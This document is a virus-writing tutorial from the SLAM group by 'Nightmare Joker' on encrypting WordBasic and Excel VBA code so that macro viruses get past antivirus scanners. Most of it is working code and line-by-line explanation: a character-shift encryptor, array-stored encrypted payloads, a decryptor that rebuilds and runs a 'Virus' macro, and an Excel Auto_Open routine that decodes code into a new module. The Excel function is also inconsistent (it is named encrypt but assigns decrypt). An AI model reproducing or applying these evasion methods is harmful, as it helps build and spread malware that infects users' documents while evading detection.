How to encrypt wordbasic
and vba code
Nightmare Joker [SLAM]
Let's start with Word:
~~~~~~~~~~~~~~~~~~~~~~
The most macro virus scanner, like HMVS and F/WIN are practically able
to find all word macro viruses, which don't hide the main code lines
of a macro virus, like "MacroCopy" and "FileSaveAs". The scanners search
within the doc/dot files the strings for the macro commands. If you
encrypt now the their most important scan strings then they can't find
your virus. Probably only for a short time, but the many different
ways to encrypt the code let's make your virus undetectable again within
a short time, too. ;)
After the SLAM #2 Issue, where the Killok virus would published ask me
some people how to encrypt and of course decrypt the wordbasic and vba
code. So, in principle it's very easy. For example, if you have the
code line:
FileSaveAs .Format = 1
then you only have to change every ascii sign with the next following.
The first ascii sign "F" has the sign code "70". We must now only add
"1" to the ascii code of the character and translate it back to the
ascii sign. If we make that with the whole Sentence then it looks
like that:
GjmfTbwfBt /Gpsnbu > 2
Of course, you can add "2" or more numbers to the sign code, too.
This in principle really *lame* encryption methode is good enough to
confuse the heuristic analyse of the av scanners. If you want to use
a more complex encryption then consider that WordBasic is REALLY slow!
If your virus have about 5000 Bytes then it could take more than 15
seconds to decrypt the code! That could be a little bit to conspicuous. ;)
Look now to the following code. It demonstrate the simple way to
encrypt your code within a wordbasic macro:
ToolsMacro .Name = "OldCODE", .Show = 1, .Edit
EditSelectAll : a$ = Selection$()
DocClose 2
For a = 1 To Len(a$)
b$ = Mid$(a$, a, 1)
b = Asc(Mid$(a$, a, 1))
c = b + 1
If c > 255 Then c = c - 256
d$ = d$ + Chr$(c)
Next
ToolsMacro .Name = "NewCODE", .Show = 1, .Edit
Insert d$
The first three code lines open the "OldCODE" macro (normal.dot),
==> ToolsMacro .Name = "OldCODE", .Show = 1, .Edit
and select the whole macro code.
==> EditSelectAll
Copy the selected code lines into the a$ variable
==> a$ = Selection$()
and close it again.
==> DocClose 2
The number "2" behind the DocClose command mean that we close the macro
without saving it.
The following code lines encrypt now the code within the a$ variable.
At first create a loop, which jumps back to this line until we have
encrypted the last character of the a$ variable.
==> For a = 1 To Len(a$)
Copy the ascii sign of the current position within the ax variable to
the b$ variable.
==> b$ = Mid$(a$, a, 1)
Insert now the ascii code of the ascii sign within the bX variable into
the integer b.
==> b = Asc(Mid$(a$, a, 1))
Add 1 to the number of the integer b
==> c = b + 1
If the integer c is bigger than 255 then subtract 256 of it.
==> If c > 255 Then c = c - 256
At last insert the *new* encrypted character into the d$ variable
==> d$ = d$ + Chr$(c)
and jump back to the first line of the Loop, if that wasn't the last
character of the code within the ax variable.
==> Next a
After that the d$ variable contains the *new* encrypted virus code.
Open now a new macro with the name "NewCODE"
==> ToolsMacro .Name = "NewCODE", .Show = 1, .Edit
and insert the encrypted code lines.
==> Insert d$
So, that's it. Now you see the encrypted code in the "NewCODE" macro.
Do NOT close the "NewCODE" macro NOW. Paste and insert it immediately
into your new virus/Arrays. If you would close it then our good old
M$ Word would destroy the whole encrypted code, because it would try
to mark all errors with a space sign. If you would translate that, then
your decryption routine would decrypt the space characters too and you
would get only some shit. ;)
Let's look now on the encrypted code within the virus.
In principle there are three ways to store the encrypted code:
- Arrays
- Document variable
- Macro
The last methode is probably the most difficult methode and is only
useful if you want to make a real polymprphic macro virus. The second
methode has only the advantage that you can reduce the main virus code
extreme. The best and fastest methode is the first. Arrays are really
fast and easy to decode. Look at the following example:
Dim Shared A$(8)
Sub MAIN
A$(0) = "ÃÍ»¼Æ¿ÏÎɧ»½ÌÉÍ"
A$(1) = "À~zz ÃÆ¿¨»Ç¿~"
A$(2) = " ÉÌzÁzzz®ÉzÉÏÈÎ ÃÆ¿Í"
A$(3) = "£Àz ÃÆ¿Í~ ÃÆ¿¨»Ç¿~Ázz||z®Â¿È"
A$(4) = " ÃÆ¿¦ÃÍÎzÁ"
A$(5) = "Â~zz ÃÆ¿¨»Ç¿~"
A$(6) = "£ÀzÀ~zzÂ~z®Â¿È"
A$(7) = "£Àz¡¿ÎɽÏÇ¿Èΰ»Ì~|¥ÃÆÆÉÅ|zz||z®Â¿È"
A$(8) = " ÃÆ¿»Ð¿Íz ÉÌÇ»Îzz"
ToolsMacro .Name = "Virus", .Show = 1, .Edit
For i = 1 To 8
For x = 1 To Len(A$(i))
b = Asc(Mid$(A$(i), x, 1))
c = b - 1
If c < 0 Then c = c + 255
d$ = d$ + Chr$(c)
Next x
Insert d$
InsertPara
d$ = ""
Next i
DocClose 1
Virus
ToolsMacro .Name = "Virus", .Show = 1, .Delete
The first 12 lines are the Arrays and the code for it.
At line 13 begins the main decryption routine. The virus opens
there a new macro (normal.dot) with the name "Virus".
=> ToolsMacro .Name = "Virus", .Show = 1, .Edit
Creates a loop (for the 8 Arrays)
=> For i = 1 To 8
and an other loop to decrypt the current variable = A$(i) within the Array.
=> For x = 1 To Len(A$(i))
Get the ascii code from the current ascii sign within the variable A$(i)
=> b = Asc(Mid$(A$(i), x, 1))
Subtract now "1" from the ascii code
=> c = b - 1
If the integer is smaller than 0 then add "255" to it.
=> If c < 0 Then c = c + 255
Translate the ascii code back to the ascii sign and insert it into the
d$ variable.
=> d$ = d$ + Chr$(c)
Jump back to the start of the second loop, if the current ascii sign isn't
the last of the whole current A$(i) variable.
=> Next x
Insert the decrypted code into the new "Virus" macro.
=> Insert d$
=> InsertPara
Delete the content of the d$ variable now
=> d$ = ""
and jump back to the first loop to decrypt the next variable within the
Array.
=> Next i
If we decrypted the whole A$(8) Array then close and save the "Virus" macro.
=> DocClose 1
That's all. Now you have your main virus within the "Virus" macro and
could start it to infect a other file or to do something else. ;)
=> Virus
Of course, at last should you delete the "Virus" macro again.
=> ToolsMacro .Name = "Virus", .Show = 1, .Delete
Isn't it easy? I think it is and it should be really no problem for
everyone to use a encrypted code within his own word macro virus.
OK, and now on Excel:
~~~~~~~~~~~~~~~~~~~~~
So, let's look now to a simple decryption methode for a excel vba module.
Dim Shared H$(7)
Sub Auto_Open()
H$(0) = "¥¥Æõõñîèæùîôó³ÉîøõñæþÆñê÷ùø¥Â¥Ëæñøê"
H$(1) = "¥¥Øíêêùøù³ÓæòꮳØêñêèù"
H$(2) = "¥¥ÆèùîûêÜîóéôü³ØêñêèùêéØíêêùø³Éêñêùê"
H$(3) = "¥¥Øíêêùø§ÉÔÓ§®³Øêñêèù"
H$(4) = "¥¥ÆèùîûêÜîóéôü³ØêñêèùêéØíêêùø³Ûîøîçñê¥Â¥Ëæñøê"
H$(5) = "¥¥Æõõñîèæùîôó³ÆèùîûêÜô÷ðçôôð³Øæûê"
H$(6) = "¥¥Üîóéôüøéæù©®³Æèùîûæùê¿¥Øíêêùø§×êõñîèæùꧮ³Éêñêùê"
H$(7) = "¥¥Æõõñîèæùîôó³ÉîøõñæþÆñê÷ùø¥Â¥Ù÷úê"
Open "\H.txt" For Output As #1
For X = 0 To 7
j$ = encrypt(H$(X))
Print #1, j$
Next X
Close #1
Modules.Add
ActiveSheet.InsertFile Filename:="\H.txt"
End Sub
Function encrypt(k$)
For i = 1 To Len(k$)
b = Asc(Mid$(k$, i, 1))
c = b - 1
d$ = d$ + Chr$(c)
Next i
decrypt = d$
End Function
The first 10 lines are again the Arrays and the code for it.
Note: The encrypted code within the Arrays is only a example!
I say that, because there are sure again some people, who think
they must use this encrypted example code in their own virus. ;)
At line 11 begins the main decryption routine. The virus opens
there a normal ascii file (H.txt).
=> Open "\H.txt" For Output As #1
Generates a loop. (0 to number of Arrays)
=> For X = 0 To 7
And decrypt one of the variables within the Array.
=> j$ = decrypt(H$(X))
Insert the decrypted code line into the ascii file H.txt.
=> Print #1, j$
If that wasn't the last variable, then decrypt the next. :)
=> Next X
So, if we have decrypted the whole code then close the ascii file
=> Close #1
and insert a new module into the main virus excel file.
=> Modules.Add
Insert now the decrypted code into the new module.
=> ActiveSheet.InsertFile Filename:="\H.txt"
Well, now you must only start the new module and delete it after that
again. That's all you have to do for a excel anti-heuristic virus. ;)
Here still the description of the main decryption routine:
=>Function encrypt(k$)
Generate a loop. (lenght of the loop = lenght of the string k$)
=> For i = 1 To Len(k$)
Get the ascii code from the current ascii sign within the variable k$
=> b = Asc(Mid$(k$, i, 1))
Subtract now "1" from the ascii code
=> c = b - 1
Translate the ascii code back to the ascii sign and insert it into the
d$ variable.
=> d$ = d$ + Chr$(c)
Jump back to the begin of the loop.
=> Next i
If we have decrypted the whole code then insert it into the d$ variable.
=> decrypt = d$
=> End Function
Well, that's it. I hope everyone understand this description. If someone
want to see a example virus then look at the Anti-Heuristic Excel Virus DON.
bye
-Nightmare Joker-